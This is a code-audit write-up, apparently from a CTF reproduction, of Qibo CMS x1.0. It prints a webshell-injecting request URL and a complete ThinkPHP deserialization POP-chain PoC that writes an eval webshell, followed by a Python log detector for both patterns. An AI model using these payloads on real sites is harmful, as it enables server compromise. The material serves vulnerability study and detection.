[Code Audit] Qibo Website Builder (齐博建站系统) x1.0 Enterprise Edition Code Audit

Posted by Y4tacker


Preface

Reproducing a challenge from 2021 DASCTF July X CBCTF 4th.

Command execution vulnerability in the x1.0 admin backend

The vulnerable point is the sysup function in application/admin/controller/Upgrade.php.

Following into writelog, interestingly there is no filtering at all: the input is concatenated directly.

And what gets written is a PHP file, which is rather careless.

So we simply request:

http://yyds.top/admin.php/admin/upgrade/sysup.html?upgrade_edition=%22,%22%22=%3E-eval($_POST[%27yyds%27])-%22,];?%3E// 

which creates a one-line webshell at runtime/client_upgrade_edition.php.

Front-end deserialization vulnerability in x1.0 Enterprise Edition

The get_label method in application/index/controller/Labelmodels.php

Just pass an array in. A PoC for this version is also available online; there are certainly better ones, and those who know, know.

<?php
namespace think\process\pipes {
    class Windows {
        private $files = [];

        public function __construct($files)
        {
            $this->files = [$files]; // $files => a subclass of think\Model, new Pivot(); Model itself is abstract
        }
    }
}

namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;

        function __construct($output, $modelRelation)
        {
            $this->parent = $output;  // $this->parent => think\console\Output
            $this->append = array("xxx"=>"getError");     // calls getError, which returns $this->error
            $this->error = $modelRelation;               // $this->error must be a subclass of Relation that is also a subclass of OneToOne => HasOne
        }
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}

namespace think\model\relation{
    class HasOne extends OneToOne {

    }
}
namespace think\model\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;    // $query points to Query
            $this->bindAttr = ['xxx'];// the $value, used as the second argument of the call
        }
    }
}

namespace think\db {
    class Query {
        protected $model;

        function __construct($model)
        {
            $this->model = $model; // $this->model => think\console\Output
        }
    }
}
namespace think\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle; // $handle => think\session\driver\Memcached
        }

    }
}
namespace think\session\driver {
    class Memcached
    {
        protected $handler;

        function __construct($handle)
        {
            $this->handler = $handle; // $handle => think\cache\driver\File
        }
    }
}

namespace think\cache\driver {
    class File
    {
        protected $options=null;
        protected $tag;

        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }

    }
}

namespace {
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
    echo urlencode(serialize($window));

}
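As an added example (not part of the write-up or the product), a small Python routine that flags both request patterns described above in access-log lines: PHP markers inside upgrade_edition sent to sysup, and a serialized PHP object header sent to get_label. The route prefixes are assumptions modelled on the controller paths quoted above, and the log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Route prefixes are assumptions derived from the controller paths in the write-up.
SYSUP_ROUTE = "/admin.php/admin/upgrade/sysup"
GET_LABEL_ROUTE = "/index.php/index/labelmodels/get_label"  # assumed front-end route

# PHP-injection markers that a legitimate edition string never contains.
PHP_MARKERS = re.compile(r"<\?|\?>|\beval\s*\(|\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)
# Header of a serialized PHP object, e.g. O:27:"think\process\pipes\Windows"
SERIALIZED_OBJ = re.compile(r'\bO:\d+:"')

# Common/combined log format: client, ident, user, [time], "METHOD target PROTO", status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def classify(line: str):
    """Return (reason, client_ip) when a line matches one of the two abuse patterns, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    query = unquote(url.query)  # decode percent-encoding so %3C%3F and <? are treated alike
    path = url.path.lower()
    if path.startswith(SYSUP_ROUTE) and PHP_MARKERS.search(query):
        return ("php injection via upgrade_edition", m.group("ip"))
    if path.startswith(GET_LABEL_ROUTE) and SERIALIZED_OBJ.search(query):
        return ("serialized object passed to get_label", m.group("ip"))
    return None

def scan(lines):
    """Return every hit as a list of (reason, client_ip), in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (not real traffic); the first reuses the request URL from the write-up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2021:12:00:01 +0800] "GET /admin.php/admin/upgrade/sysup.html?upgrade_edition=%22,%22%22=%3E-eval($_POST[%27yyds%27])-%22,];?%3E// HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Jul/2021:12:00:02 +0800] "GET /admin.php/admin/upgrade/sysup.html?upgrade_edition=enterprise HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jul/2021:12:00:03 +0800] "GET /index.php/index/labelmodels/get_label?data[]=O:27:%22think%5Cprocess%5Cpipes%5CWindows%22:1:{} HTTP/1.1" 200 77',
    '198.51.100.9 - - [10/Jul/2021:12:00:04 +0800] "GET /index.php/index/article/show?id=3 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for reason, ip in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

A hit on the first pattern should be followed by checking runtime/client_upgrade_edition.php for anything other than the expected edition string.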
